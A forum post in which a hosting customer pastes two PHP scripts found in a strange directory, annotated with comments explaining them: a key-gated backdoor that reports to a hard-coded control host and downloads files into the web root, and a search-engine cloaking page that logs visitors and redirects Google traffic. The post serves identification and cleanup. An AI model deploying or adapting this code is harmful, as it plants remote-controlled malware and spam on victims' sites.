Hacked? - Found some strange directories in my root
I have a hosted account for my domain and recently found a directory under /public_html/ whose name is a string of random letters, containing a couple of scripts, including a file that is steadily building up logging information.
Directory perms were 777 (I did not create it!)
I have included the contents of the scripts below - does anyone know what it is, where it came from or what it is used for?
INDEX.PHP includes:
PHP Code:
<?php
// Operator gate: the request must carry ?k= whose MD5 equals this hard-coded digest,
// otherwise the script prints "nk" and stops. The plaintext is not in this file; the
// digest string itself is a useful artifact when searching other files on the host.
$k='6fb8e25b609624dc10a68641e846102a';if ($k != md5($_GET['k'])) { echo'nk'; exit; }
// Hard-coded control host and path used by doinit()/doget() below (plain HTTP, port 80).
// $_GET[c] uses a bare-word key (relies on the undefined-constant-to-string fallback of
// old PHP) and selects the command.
$ctl="188.124.3.195";$ctlp="/ctl.php";$c=$_GET[c];
// Command dispatch: init = create cache/ and report this script's URL to the control host,
// check = report own URL and test write access, get = download a file from the control
// host into this directory, del = wipe files and/or remove this script.
if ($c=='init'){doinit();}if ($c=='check'){docheck();}if ($c=='get'){doget();}if ($c=='del'){dodel();}
// "del" command. With ?all=1 it unlinks every entry in the current directory and in
// cache/, removes cache/, and prints the number of directory entries visited ($c is not
// initialised in this scope and also counts "." and ".."). Without all=1 it leaves an
// empty index.html behind and deletes the running script itself — which is why such a
// directory may be found with only leftover files in it.
function dodel() {
if ($_GET[all]==1) {
$d="."; $dh=opendir($d);
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink($f);} } closedir($dh);
$d="cache"; $dh=opendir($d);
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink("cache/$f");} } closedir($dh); rmdir("cache"); echo $c;
// Self-removal branch: creates/truncates index.html, then unlinks basename(PHP_SELF).
} else { $fd=fopen("index.html","w");fclose($fd);unlink(basename($_SERVER[PHP_SELF]));}
}
// "get" command: a file downloader. ?a= names a path on the control host; the response
// body is written to a file in the current directory named basename($a). If that name
// ends in "php" (case-insensitive), the remote path is requested with "php" replaced by
// "txt" — presumably so the control host serves the file as text rather than executing
// it — while the local file keeps the original name. Prints the remote path and the
// number of bytes written.
function doget() {
global $ctlp, $ctl; $a = $_GET[a];
$lname = basename($a);
// dirname("/ctl.php") is "/", so the remote path is "/" followed by $a.
$b=dirname($ctlp);
echo "$b$a";
// eregi() is the case-insensitive POSIX regex function (removed in PHP 7); the
// str_replace hits every "php" substring in the path, not only the extension.
if (eregi("php$",$lname)){$a1 = str_replace("php", "txt", $a);}
else{$a1=$a;}
// The local file is opened before the download, so an empty file remains if g() dies.
$fd=fopen($lname,"w");
$d = g($ctl,80,"$b$a1");
fwrite($fd,$d); fclose($fd);
echo "'".strlen($d)."'";
}
// "init" command: creates cache/ (prints "0" and stops if that fails), then fetches
// /ctl.php?c=init&me=<base64 of this script's URL> from the control host over port 80
// and echoes whatever comes back — i.e. it reports the infected URL to the operator.
// An outbound connection to $ctl on port 80 is the network artifact to look for in logs.
function doinit() {
global$ctl,$ctlp;$b=mkdir("cache");if(!$b){echo '0';exit;}echo g($ctl,80,$ctlp."?c=init&me=".base64_encode(getme()));
}
// "check" command: prints this script's URL followed by ";1" if a file named "tmp" can be
// opened for writing in the current directory, else ";0". The fopen() in "w" mode creates
// (or truncates) that "tmp" file as a side effect and the handle is never closed.
function docheck(){
echo getme();if (fopen("tmp","w")) {echo";1";}else{echo";0";}
}
// Returns this script's own URL, built from HTTP_HOST and PHP_SELF (bare-word array
// keys); the scheme is always "http://" regardless of how the request arrived.
function getme() { return "http://".$_SERVER[HTTP_HOST]."".$_SERVER[PHP_SELF]; }
// Minimal HTTP/1.0 GET over a raw socket (no TLS); returns the response body only.
// Dies with "Can't open socket" if the connection fails (60 s connect timeout).
function g($server, $port, $file) {
$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");
// Computed but never used within this function.
$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;
fputs($socket, "GET $file HTTP/1.0\r\n");
fputs($socket, "Host: $server\r\n\r\n");
$dat = '';
// Read and discard the header block (up to the first blank line)...
do {$dat .= fgets ($socket, 1024);} while (strpos($dat,"\r\n\r\n") === false);
$dat = '';
// ...then read the body until EOF. The status code is never checked, so an error page
// from the remote host would be handed back (and written to disk by doget()) as-is.
while (!feof($socket)) {$dat .= fread($socket,8192);}
fclose($socket);
return $dat;
}
?>
XTYB.PHP includes:
PHP Code:
<?php
// Search-engine doorway / cloaking page. Every hit is logged first; then a visitor that
// is outside the hard-coded IP ranges and arrived from a "google" referer is redirected
// to a third-party site, while everyone else (including crawlers in those ranges) gets a
// keyword page stitched together from Yahoo search results, cached under cache/.
// Writes IP, time, host, URI, referer and user agent to evekwalicu.txt.
dolog();
error_reporting(0);
// Number of "related" links to embed in the page (9-11), randomised per page build.
$nr=rand(9,11);
// First query-string key/value pair: the key name is arbitrary, the value is the keyword.
list($arg,$val)=@each($_GET);
// Base64-encoded HTML template (redacted in this listing). It carries the placeholders
// #title#, #kw#, #content#, #relink# and #rnum# that are filled in further down.
$t=base64_decode("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");
// Cloaking decision: checkg() tests the client IP against a static list of CIDR blocks.
// Only clients outside those blocks whose referer contains "google" are redirected;
// all others fall through to the generated page.
$g = checkg($_SERVER[REMOTE_ADDR]);
if (!$g) {if(eregi("google",$_SERVER[HTTP_REFERER])){
$self=$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];
// Redirect target; the original referer and this page's URL are passed along as parameters.
$goto='http://longsignups.net/in.cgi?7&ref='.urlencode($_SERVER[HTTP_REFERER])."&page=".urlencode($self);
header("Location: $goto");exit;}}
// Keyword taken from the URL, with hyphens turned back into spaces.
$q = str_replace("-", " ", urldecode($_GET[$arg]));
$c=1;
// Loads the keyword list from kw.txt (another dropped file to look for alongside this
// script). $id is never assigned anywhere in this listing and $c never changes, so the
// `$c==$id` branch appears dead; the loop effectively just trims each line.
$kws = @file('kw.txt');foreach($kws as $k) { if ($c==$id) { $q = trim($k); } $tmp[]=trim($k); } $kws = $tmp;
// Only keywords present in kw.txt are served; anything else gets a bare "404".
if (!in_array($q,$kws)){echo '404';exit;}
// Pick $nr random keywords and build links back to this same script for each, so the
// generated pages cross-link one another.
shuffle($kws);$rl = array_splice($kws,0,$nr);
foreach($rl as $r) { $rrl[] = "<a href=\"?$arg=".urlencode(str_replace(" ", "-", $r))."\">$r</a>"; }
// Generated pages are cached as cache/<md5 of keyword>; a cache hit is served verbatim.
$h=md5($q); if(file_exists("cache/$h")){echo join('',file("cache/$h"));exit;}
// Fetch search-result snippets for the keyword. gets2() returns 0 rather than an array
// on failure, which is not handled here (errors are suppressed above).
$c=gets2($q);
$t=str_replace("#title#",ucwords($q),$t);
$t=str_replace("#kw#",$q,$t);
// Snippets and cross-links are mixed in random order into #content#.
$cont = array_merge($c, $rrl);
//$cont = $c;
shuffle($cont);
$t=str_replace("#content#",join(' ',$cont),$t);
// join() is given a string instead of an array here; #relink# appears to end up blank.
$t=str_replace("#relink#",join(' ', ''),$t);
// Every #rnum# becomes a short random letter string from gp(). create_function() is
// deprecated/removed in current PHP.
$t = preg_replace_callback("/#rnum#/",create_function('$matches','return gp();'), $t);
// Write the finished page to the cache, then serve it.
$f=@fopen("cache/$h","w");fwrite($f,$t);fclose($f);
echo $t;exit;
// Appends one line per request — client IP, timestamp, server name, request URI, referer
// and user agent — to evekwalicu.txt in the script's directory. This is the steadily
// growing log file the post mentions; its contents show who has been requesting the
// page (crawlers included) and since when, which helps date the compromise.
function dolog() {
$str = "$_SERVER[REMOTE_ADDR] -- ".date("Y-m-d H:i:s")." -- $_SERVER[SERVER_NAME] -- $_SERVER[REQUEST_URI] -- $_SERVER[HTTP_REFERER] -- $_SERVER[HTTP_USER_AGENT]\n"; $lp = "evekwalicu.txt"; $fd = fopen($lp, "a");fwrite($fd, $str); fclose($fd);
}
// Fetches up to 40 Yahoo web-search results (RSS feed, adult_ok=1) for $kw over plain
// HTTP and turns them into HTML fragments. Returns 0 (not an array) if fewer than three
// <item> elements come back; otherwise a shuffled array of
// "<p><a href=link>title</a> description" strings plus three bare "<P>" entries.
// All I/O errors are suppressed with @; result text is inserted into HTML unescaped.
function gets2($kw) {
$sc = 40;
$kw =trim($kw);
$base = "/WebSearchService/rss/webSearch.xml?appid=yahoosearchwebrss&results=$sc&query=".urlencode($kw)."&adult_ok=1";
$req = $base;
// 10 s connect timeout; on failure $s is false and the @-suppressed calls below do nothing.
$s = @fsockopen("api.search.yahoo.com", 80, $_en, $_er, 10);
$rstr = "GET $req HTTP/1.0\r\n";
$rstr .= "Host: api.search.yahoo.com\r\n";
$rstr .= "\r\n";
@fwrite($s,$rstr);
$dat='';
// Skip the HTTP headers (up to the first blank line), then read the body to EOF.
do {$dat .= fgets ($s);} while (strpos($dat,"\r\n\r\n") === false);
$dat='';
while (!feof($s)) {$dat .= fread($s,8192);}
$c = $dat;
@fclose($s);
$r = preg_match_all("/<item>(.+?)<\/item>/", $c, $na);
if ($r < 3) { return 0; }
$ret = array();
// Loop starts at index 1, so the first <item> is always dropped.
for($i=1;$i<sizeof($na[1]);$i++) {
$tmp = $na[1][$i];
// Field extraction via POSIX eregi() (removed in PHP 7).
@eregi('<title>(.+)</title>', $tmp, $na2);
$title = $na2[1];
@eregi('<description>(.+)</description>', $tmp, $na2);
$description = $na2[1];
$description = str_replace("...", ".", $description);
@eregi('<link>(.+)</link>', $tmp, $na2);
$link = $na2[1];
//$ret[] = array($link, $title, $description);
//if ($i==1) {
$ret[] = "\n\n<p><a href=\"$link\">$title</a> $description";
//} else {
// $ret[] = " <br>$title $description ";
//}
}
$ret[] = "<P>";
$ret[] = "<P>";
$ret[] = "<P>";
shuffle($ret); return $ret;
}
// Returns 1 if $ip falls inside one of four hard-coded CIDR blocks, else 0. The function
// name and the "google" referer test in the caller suggest these are meant to be search
// crawler addresses (presumably so crawlers always receive the generated page instead of
// the redirect); the list is static and would be stale for any current crawler ranges.
// split() is POSIX-regex based and was removed in PHP 7.
function checkg($ip) {
$nfilter = split("\n", "72.14.192.0/18
74.125.0.0/16
64.233.160.0/19
66.249.64.0/19");
foreach ($nfilter as $f) {
if (ip_in_range($ip, $f)) { return 1; }
} return 0;
}
// Binary string of $dec, left-padded with zeros to 32 characters (helper for ip_in_range).
Function decbin32 ($dec) { return str_pad(decbin($dec), 32, '0', STR_PAD_LEFT); }
// Generic IPv4 range test. Accepts $range as "a.b.c.d/mask" (dotted or prefix-length
// mask), "a.b.*.*" wildcard, or "lower-upper"; returns a truthy value when $ip matches.
// Note that in the prefix-length branch the final test is a bit-subset comparison, not
// an equality of the network bits, so it can also accept some addresses outside the
// block (every set bit of the IP merely has to be set in the broadcast address).
Function ip_in_range($ip, $range) {
if (strpos($range, '/') !== false) {
list($range, $netmask) = explode('/', $range, 2);
// Dotted netmask: compare the masked network portions.
if (strpos($netmask, '.') !== false) {
$netmask = str_replace('*', '0', $netmask);
$netmask_dec = ip2long($netmask);
return ( (ip2long($ip) & $netmask_dec) == (ip2long($range) & $netmask_dec) );
} else {
// Prefix-length netmask: pad a short range like "72.14" out to four octets first.
$x = explode('.', $range);
while(count($x)<4) $x[] = '0';
list($a,$b,$c,$d) = $x;
$range = sprintf("%u.%u.%u.%u", empty($a)?'0':$a, empty($b)?'0':$b,empty($c)?'0':$c,empty($d)?'0':$d);
$range_dec = ip2long($range);
$ip_dec = ip2long($ip);
// This value is computed and then immediately overwritten two lines below.
$broadcast_dec = bindec(substr(decbin32($range_dec), 0, $netmask)
. str_pad('', 32-$netmask, '1'));
$wildcard_dec = pow(2, (32-$netmask)) - 1;
$broadcast_dec = $range_dec | $wildcard_dec;
return (($ip_dec & $broadcast_dec) == $ip_dec);
}
} else {
if (strpos($range, '*') !==false) { // a.b.*.* format
$lower = str_replace('*', '0', $range);
$upper = str_replace('*', '255', $range);
$range = "$lower-$upper";
}
if (strpos($range, '-')!==false) { // A-B format
list($lower, $upper) = explode('-', $range, 2);
$lower_dec = ip2long($lower);
$upper_dec = ip2long($upper);
$ip_dec = ip2long($ip);
return ( ($ip_dec>=$lower_dec) && ($ip_dec<=$upper_dec) );
}
return false;
}
// Unreachable: every branch above returns; $netmask_dec would also be undefined here.
$ip_dec = ip2long($ip);
return (($ip_dec & $netmask_dec) == $ip_dec);
}
// Builds a string of $length (default 4) distinct characters drawn from a fixed lowercase
// alphabet, used to fill the #rnum# placeholders in the page template. Despite the
// variable name this is filler text, not a credential (mt_rand() would not be suitable
// for one). The distinctness check means lengths above the alphabet size never finish.
function gp ($length = 4)
{
$password = "";
$possible = "abcdfghjkmnpqrstvwxyz";
$i = 0;
while ($i < $length) {
$char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
// Only accept a character that is not already in the result.
if (!strstr($password, $char)) {
$password .= $char;
$i++;
}
}
return $password;
}
?>